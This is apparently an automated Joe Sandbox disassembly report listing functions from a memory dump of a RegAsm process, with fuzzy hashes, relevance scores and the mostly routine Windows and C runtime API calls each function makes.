Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction ID: bc8c9cdb39ea7b6907bdcd078d42f788ce3f3be240e1371db2048b296ab99c2e
Opcode Fuzzy Hash: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction Fuzzy Hash: FBF04F72A04204DFD710EF99E842B9C77B0FB84724F10412BF411EB2E1CBB959409B58

Function 0041E6A4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E5FD,00000001,45F1B473,?,?,0041EE68,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6DB

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction ID: f4de27644733dcfc8870d4860b87f459398b730b02dc09fbb697d88a70ba3928
Opcode Fuzzy Hash: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction Fuzzy Hash: 2FF0EC3930024597CB149F36D8457AABF55EFC1714B97405AEE068B290C6759883C754

Function 0041464E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A37,?,20001004,00000000,00000002,?,?,00412039), ref: 00414682

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: c8c0b9562f9231183dee5b7a6e52053c98a93abb6350c4165c74df5b9bb5bc08
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: D9E04831540118B7CF122F61DC04EEE7F15FF95751F064116FC0566161C7399961A69D

Function 00407C53 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C5F,0040727A), ref: 00407C58

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction ID: 3c64f4b928e2e8a9299ff9da9a038668c79c2f648c86c238da55c8401a5bab25
Opcode Fuzzy Hash: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction Fuzzy Hash:

Function 0041EFC8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFC8

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 00404B10 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B3C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B59
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B7D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BA8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C6F
__Getctype.LIBCPMT ref: 00404C86
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D68
std::_Facet_Register.LIBCPMT ref: 00404D6E

Strings

bad locale name, xrefs: 00404D88

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction ID: 6e9f63e8d2ea1b6a4942e0921d9002d8c0fd89e6bfff9ad2541224c8a884b4bc
Opcode Fuzzy Hash: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction Fuzzy Hash: D56191B19047408BE710DF65D981B5BB7E4AFD4304F05483EF989A7392E738E948CB5A

Function 0040A988 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAA7
___TypeMatch.LIBVCRUNTIME ref: 0040ABB5
_UnwindNestedFrames.LIBCMT ref: 0040AD07
CallUnexpected.LIBVCRUNTIME ref: 0040AD22

Strings

csm, xrefs: 0040AA32
hqB, xrefs: 0040AA9E
csm, xrefs: 0040A9C5
csm, xrefs: 0040AADE

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction ID: 60820d6e0ecca0eb9fd5676567882ca170ad0f0461b4efe27468591c46910b05
Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction Fuzzy Hash: D1B177719003099FDF24DFA5C9809AFB7B5FF14304B15456AE8017B282D339EA61CF9A

Function 00422D30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042484F), ref: 00422D49

Strings

log, xrefs: 00422DA6, 00422DB5
log10, xrefs: 00422D8B, 00422D9A
sqrt, xrefs: 00422E88
pow, xrefs: 00422DE7, 00422E91, 00422EDE
asin, xrefs: 00422E76
acos, xrefs: 00422E7F
exp, xrefs: 00422DC8, 00422E2D

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction ID: c72ee430fc5992e789082aa674a62eb4bc159944c4a08777ca012a565c4a57b4
Opcode Fuzzy Hash: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction Fuzzy Hash: C2515F71B0062AEBCF108F59FA481AE7BB0FB05304FD24157D891A7264CBBD8925DB5E

Function 0040717D Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407183
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00407191
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071A2
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071B3

Strings

GetTempPath2W, xrefs: 004071A8
kernel32.dll, xrefs: 0040717E
GetCurrentPackageId, xrefs: 0040718B
GetSystemTimePreciseAsFileTime, xrefs: 00407197

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424315 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0137CBE8,0137CBE8,?,7FFFFFFF,?,004245E5,0137CBE8,0137CBE8,?,0137CBE8,?,?,?,?,0137CBE8,?), ref: 004243BB
__alloca_probe_16.LIBCMT ref: 00424476
__alloca_probe_16.LIBCMT ref: 00424505
__freea.LIBCMT ref: 00424550
__freea.LIBCMT ref: 00424556
__freea.LIBCMT ref: 0042458C
__freea.LIBCMT ref: 00424592
__freea.LIBCMT ref: 004245A2

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction ID: 2268128186bf180321159b17a5804e3cf269d1f4a161c5de96289f76b50a9a64
Opcode Fuzzy Hash: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction Fuzzy Hash: 55711872B00225ABDF20AF94AC41BAF77A5DFC9714FA4001BEA54A7381D73CDC818769

Function 004142F1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,FD41157B,?,004143FE,004038D3,?,?,00000000), ref: 004143B2

Strings

ext-ms-, xrefs: 0041435C
api-ms-, xrefs: 00414348

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 29acd09180d048b520d34109221675969bd24e1d04ac4f63b004638bf800aa58
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9A210572B01218EBCB219B61EC45FDB3758AF81765F250222ED26A7380D738ED41C6D8

Function 00422220 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction ID: 0fa8f66f13a9205f03f3c964acb7b0f3d35d0cf0561fe90a84cb6ac065f7fb8a
Opcode Fuzzy Hash: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction Fuzzy Hash: 2FB1FA70B00265BFDB11DF59D980BAE7BB1BF85304F54815AE400AB392C7F99D42CB69

Function 0040A61A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A611,00408D4A,00407CA3), ref: 0040A628
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A636
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A64F
SetLastError.KERNEL32(00000000,0040A611,00408D4A,00407CA3), ref: 0040A6A1

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction ID: 17c3b720e5989fb0f4645250ee9d2db9be2b1969e3f2a356d50bd165ba2ebccc
Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction Fuzzy Hash: 4C01D2322083111EE62836B5BC456672678DB21378734023FF114B22E1EF7F1C11558D

Function 004114B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FD41157B,?,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 004114ED
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004114FF
FreeLibrary.KERNEL32(00000000,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 00411521

Strings

CorExitProcess, xrefs: 004114F7
mscoree.dll, xrefs: 004114E6

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction ID: 1c3cb0f38f93fbefe2a6f9ddff53ce04e6b84d498977bd807167e5d34d417036
Opcode Fuzzy Hash: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction Fuzzy Hash: 3801A231B40625FFDB218F50DC09BBEBBB9FB44B15F400526E912A22A0DB789D00CA98

Function 00418EA1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F28
__alloca_probe_16.LIBCMT ref: 00418FE9
__freea.LIBCMT ref: 00419050

Part of subcall function 00415416: HeapAlloc.KERNEL32(00000000,?,?,?,0040743B,?,?,004038D3,0000000C), ref: 00415448

__freea.LIBCMT ref: 00419065
__freea.LIBCMT ref: 00419075

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction ID: 70ac7dc22d859429bcfaf21a5452dbaba508fd75fda8d3d1cad1bcbaee3c79d9
Opcode Fuzzy Hash: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction Fuzzy Hash: CE51C872600216AFEB249F65CC41EFB3AAAEF48754B15012EFD08D7250EB39DC918769

Function 00405A19 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A20
std::_Lockit::_Lockit.LIBCPMT ref: 00405A2A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A64
std::_Facet_Register.LIBCPMT ref: 00405A7B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405A9B

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction ID: aa6d00897e01abd1bad4c0c36b67e0d55590054934450fdc9fe3478e464ff2ad
Opcode Fuzzy Hash: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction Fuzzy Hash: A001AD71A00A16CBCB05EB658881AAF7761EF84324F24052EF411BB3D2CF3C9E058F89

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::failbit set, xrefs: 00401E62, 00401F41
ios_base::eofbit set, xrefs: 00401F46
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction ID: d02687490f24597757631495c4e1f09aa39ba096523de16938e047820cfe1a48
Opcode Fuzzy Hash: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction Fuzzy Hash: 7B1124B2910715ABC710DF58D801B96B3E8AF08310F14853FF954E7291F778A844CBA9

Function 0040B762 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B76F
GetLastError.KERNEL32(?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B66D), ref: 0040B779
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A583), ref: 0040B7A1

Strings

api-ms-, xrefs: 0040B786

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 6663bac76f2ed2691183a1b60790d81093b85d379b5950931f3594d96b826320
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 95E01A34384208BFEF605B61EC06F5A3E64AB80B85FA04031FA0DE91E1E779A96195CC

Function 004164B2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(FD41157B,00000000,00000000,0040BDA8), ref: 00416515

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416770
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167B8
GetLastError.KERNEL32 ref: 0041685B

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction ID: 23b960d84f86169114bff6dd91ebd8bfb000f40d43b919249b886c4f1d777fdd
Opcode Fuzzy Hash: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction Fuzzy Hash: 57D17975E002589FCB11DFA8D880AEDBBB5FF48304F19452AE866E7341D734E882CB54

Function 0040A731 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A7F8
___AdjustPointer.LIBCMT ref: 0040A81B
___AdjustPointer.LIBCMT ref: 0040A8B7

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 563ab20b51bfab9fbe5384d5980a8cd95d5d08f0ac2ebead566dcb8f0746e7f3
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 8E51CF72A003069FEB29AF11C941B7A77B4EF04314F14853FE8056B2D1E739E862C79A

Function 0041B497 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

GetLastError.KERNEL32 ref: 0041B4FB
__dosmaperr.LIBCMT ref: 0041B502
GetLastError.KERNEL32(?,?,?,?), ref: 0041B53C
__dosmaperr.LIBCMT ref: 0041B543

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: e5a019830a3c5c962b54c78c2afe39edf9115806d1ecbdc6188aeecc851efa14
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3E21B371600615BFDB20AF6688809ABB7A9FF04368710C52FF91997251D778EC9087E8

Function 00410892 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: 3ec36e4c3c4c4b3940ca693e254ce5ca1d14e98f6d28ba957a4fd44e2fb4f4c4
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: E621D7B1210205AFEB20AF62CC609AB7768BF40368710452BF959D7252D7B8ECD087A8

Function 0041C42D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C435

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C46D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C48D

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: 0fd12c7dda382d3999d10f706f970f90d8e04c4becb4264e138dc4c2bd032ff0
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 4F11C4B6605515BFA72127B25CDACFF6D5CDE89398710402BF901D2102EA3CDD8295BD

Function 004241D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000), ref: 004241F0
GetLastError.KERNEL32(?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8,?,00416E6D,?), ref: 004241FC

Part of subcall function 004241C2: CloseHandle.KERNEL32(FFFFFFFE,0042420C,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8,0040BDA8), ref: 004241D2

___initconout.LIBCMT ref: 0042420C

Part of subcall function 00424184: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241B3,00421C1F,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424197

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000,0040BDA8), ref: 00424221

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: daf606a8d683033c96f790e5cebbb7c3d718dd05ed61dfd599687816ed725ea8
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: E4F03736700124BBCF226F95FC0899A3F26FF453B1F454565FE1995130CA319870AB98

Function 0041029D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041032D

Strings

pow, xrefs: 00410305, 00410322

Memory Dump Source

